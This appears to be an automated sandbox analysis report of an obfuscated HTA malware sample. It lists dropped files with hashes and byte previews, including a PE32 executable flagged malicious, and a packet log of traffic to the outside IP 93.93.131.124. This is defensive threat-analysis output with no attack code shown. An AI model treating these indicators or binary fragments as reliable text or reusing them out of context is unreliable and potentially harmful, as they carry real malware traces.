                        Preview:.... .c.....M.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1368
                        Entropy (8bit):5.3881970764721006
                        Encrypted:false
                        SSDEEP:24:3IWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R88bJ0G9rm:YWSU4y4RQmFoUeWmfmZ9tlNWR83+q
                        MD5:0EA6238BFA66E898D3A7316F8C3AC955
                        SHA1:358497BEDDC4FA7DD3FE421FF7A5BF36ED1EB9FB
                        SHA-256:83C58288F2804B5A137D4199D23E20D0D75F5491B4672965F06C37132E054F65
                        SHA-512:58D3A9A43A234DAF33846F98AEA1CC5AB81C3994A9EA4BD7BAFC0279A48137144A5468F3518A357669426DD8C1EDC39481692B0BE4D31471ED4D46B58A3C1D0B
                        Malicious:false
                        Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1197707563435464
                        Encrypted:false
                        SSDEEP:3:NlllulIXh:NllUI
                        MD5:EBD34E1A339DB85BCC60A3CC2075E978
                        SHA1:207016FCE09F682F8652522FA1FEAA677B4169FE
                        SHA-256:FDD52D6F5ACD1769789173B80841CB3EE5819C139DD245A1AF8757E0B226D7F0
                        SHA-512:7D5A684D6022EEA8213EA42B7CF36C83547794F7227498DBB2FFC2D9A35E656CFD27D371DC8D072F106263AB289F8729032551C013497047EC532067561C49AC
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):246
                        Entropy (8bit):3.511206980872271
                        Encrypted:false
                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8VO0lX4d0lH:Qw946cPbiOxDlbYnuRKkLlb9
                        MD5:0275A84F9157CDB436E949773B6FD11B
                        SHA1:B015562FAD289E5DB6646D0610D82093453077FF
                        SHA-256:7EDDD25C60CC1B79633A25282504675095AF6C16685565D78ED2FB5A1AF816B9
                        SHA-512:A00447435A9FC4718749CC06E7EAE2930759FC0568BFF54FF598FF8AA0394B71B1000A00E0FDB54C95B4F633CC9FCFF07973B9121194F62FE5C0C5FCC0949D1A
                        Malicious:false
                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.0./.2.0.2.3. . .1.5.:.3.0.:.2.1. .=.=.=.....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393)
                        Category:dropped
                        Size (bytes):16525
                        Entropy (8bit):5.33860678500249
                        Encrypted:false
                        SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                        MD5:C3FEDB046D1699616E22C50131AAF109
                        SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                        SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                        SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                        Malicious:false
                        Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                        Category:dropped
                        Size (bytes):15114
                        Entropy (8bit):5.379647096822197
                        Encrypted:false
                        SSDEEP:384:2UQxYMNAZCKjaCFxvUlNSBiWX3g9Ek+t+tRTr7GbKuQtot+trtFtntktivtSvS/Z:LeKkpbde4R
                        MD5:6128672A35D0C505159B187E67ED1C9A
                        SHA1:01CF74CF4F22DC48E98288E87181936160D15860
                        SHA-256:9DB552A3CD4200C902E715DE2B8337C09A59621907F83A1EB98CF34955B2A1F8
                        SHA-512:B5DB13AE57934C539B32F42891EF9EC21D35AF82B2102757B1358503658457072D77B0B7733CC2B6A5BC627B5BE5B7A847113265A3F5C101CCEC459E5B96C8D6
                        Malicious:false
                        Preview:SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:185+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="SetConf
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):29752
                        Entropy (8bit):5.409662602911639
                        Encrypted:false
                        SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbdcbuIQ+cbt:ceo4+rsCcQ5
                        MD5:38F3C1B6075401D74069368E67667052
                        SHA1:FCE5B360041C881C28DBABD94781AEEA6AA73BB9
                        SHA-256:F58001F3A623729229E4174495113068F19EFA5BB192DBE7A8AEB0694ACDC2C8
                        SHA-512:F456E56A6F8981790E380C804E44F158F164273FE25195E8A971465BFF5A00A69D20046B46BEE820A47B1D1917A48C9BA988018D04462B70007171E7B1303B7A
                        Malicious:false
                        Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                        Category:dropped
                        Size (bytes):386528
                        Entropy (8bit):7.9736851559892425
                        Encrypted:false
                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                        Malicious:false
                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                        Category:dropped
                        Size (bytes):1407294
                        Entropy (8bit):7.97605879016224
                        Encrypted:false
                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                        Malicious:false
                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                        Category:dropped
                        Size (bytes):758601
                        Entropy (8bit):7.98639316555857
                        Encrypted:false
                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                        MD5:3A49135134665364308390AC398006F1
                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                        Malicious:false
                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PDF document, version 1.7, 3 pages
                        Category:dropped
                        Size (bytes):105997
                        Entropy (8bit):7.916350024029986
                        Encrypted:false
                        SSDEEP:3072:9APJu00mzh2zt08TiibCS3rjPH/ipYBZ+veVC/hhY:9APJR0moSbimSfH/AYHrC5hY
                        MD5:0B0E0CD038D7A97F844B4B5068AC704B
                        SHA1:6CFB798FEDFCCF7A6F56324DBA9E635C854FA042
                        SHA-256:44F81C0CA9CC2C931CBF3E5E0CFB383E4BC8627F2F30F5B69180944564A3D53B
                        SHA-512:241C6D1D730FD71D600A6BC51955534A760163BA26160D8EB9DFFFBDD698955492A4FB80405F8C9C81AA15A726E60D2D48BB3C048D90014272128EE9E95F96B1
                        Malicious:false
                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 108 0 R/ViewerPreferences 109 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 3/Kids[ 3 0 R 21 0 R 23 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 12 0 R/F3 14 0 R/F4 19 0 R>>/ExtGState<</GS10 10 0 R/GS11 11 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1377>>..stream..x..ZM..6..7...q70.......=.$d.a...9,a3......I%.[.Uv.e....V....&.....J...?N._.......y......q$..D.>..e.....#jPTpb%......?.G^.....p...8y..x.2..p.$FY.%y..]...0...b..O?...>0&.c.2..x.....N...R..Ou|....H..?..D<..fw..7......,..x..O..O..QS<ax.|.w.}..y.8.R..;...p..vm....<....xT.s. J..G|-....,..?...p..E.%.k....tWZa.{.....'.F....l ..'..O..*u.O..<!.c..5....,...CGM........n........jy..G$.B"#xk&C.h.....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):495616
                        Entropy (8bit):6.646541158733514
                        Encrypted:false
                        SSDEEP:6144:wBJBbIOkgKzCe9dMVHsGLULRTXFewKFWTyMTkiYCw+VSvGFal+412cJcnoACqzMD:MJBMOkce9dgHs+UTVhdK12cJOs60
                        MD5:7A0DFC5353FF6DE7DE0208A29FA2FFC9
                        SHA1:44AC2504A02AF84EE142ADAA3EA70B868185906F
                        SHA-256:ABCC2A2D828B1624459CF8C4D2CCDFDCDE62C8D1AB51E438DB200AB3C5C8CD17
                        SHA-512:6DEF636AB478A7F49127C706272FF8B2862A5DE50FD34E1E8509B7C1FF1DA6C87001A764B5C9BB2D56D30534CFAEE10C8C343575E79AE853E42C3306561411CF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 2%
                        Joe Sandbox View:
                        • Filename: 82a7vPjX1R.exe, Detection: malicious
                        • Filename: cgj6THyKZr.exe, Detection: malicious
                        • Filename: putty.exe, Detection: malicious
                        File type:HTML document, ASCII text, with very long lines (52660), with CRLF line terminators
                        Entropy (8bit):0.8398533375484833
                        TrID:
                          File name:a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
                          File size:1'153'504 bytes
                          MD5:24d2c1fc57fcced31089d89c8178605b
                          SHA1:b06f20ea60cbe3785a38702d8e2072aa5f0327ca
                          SHA256:01a56c5b210084f1f6831c9b517bb3bd25564faeb0a2ca075d93027aa632f01b
                          SHA512:d98506cc4750c5edf9d20c0e05b3f46484a4badad2d5be6e6919a6db60029c75ec6391ff87018afde32f8e78c177a8117181ddfc7bff9797e40c50f04e8d24ce
                          SSDEEP:1536:pcK7grIPG3VP6P1OY4vKqoF7B021CCtvIm+lIWFpIl9/pckIV/b22Ksc1vlIIoIA:77gEPEVyPYY4vHoF7/w
                          TLSH:9635DD343979BC2043EBDA1334F14BA65CD9568FC5703A3B199AD423AA342D165B22FF
                          File Content Preview:<head>..</head>..<body>..<table STYLe="wIdTh:100%">..<tr>..<th>HSh</tH>..<th>poA</th>..<th>pBT</th>..<th>odX</Th>..<th>GIW</Th>..<th>rhV</tH>..</TR>..</table>..</body>....<body>..<table STYLe="wIdTh:100%">..<tr>..<th>Nks</tH>..<th>pOX</th>..<th>lgQ</th>..
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 6, 2023 15:30:13.429553986 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.429661036 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429699898 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.429770947 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429785967 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429822922 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.429910898 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429927111 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429960966 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.429977894 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.429992914 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430071115 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.430088043 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430151939 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430191040 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.430298090 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430310011 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430346012 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.430490017 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430505991 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430519104 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430533886 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430545092 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.430583000 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.430619001 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430632114 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.430680037 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.694628000 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694647074 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694658041 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694672108 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694684029 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694696903 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694722891 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.694742918 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.694751978 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694766045 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694818974 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.694906950 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694951057 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.694991112 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.694998026 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695009947 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695023060 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695044041 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695070028 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695107937 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695277929 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695292950 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695327997 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695431948 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695497990 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695511103 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695539951 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695564032 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695575953 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695597887 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695600033 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695640087 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695782900 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695796013 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695831060 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.695981979 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.695996046 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696038008 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696048975 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696059942 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696079969 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696084023 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696121931 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696160078 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696259022 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696300983 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696336985 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696436882 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696450949 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696482897 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696556091 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696666002 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696701050 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696705103 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696715117 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696726084 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696751118 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696760893 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696796894 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.696923971 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.696980953 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697019100 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697118044 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697130919 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697141886 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697163105 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697184086 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697206974 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697221994 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697256088 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697292089 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.697396994 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697410107 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.697443008 CEST4970980192.168.2.893.93.131.124
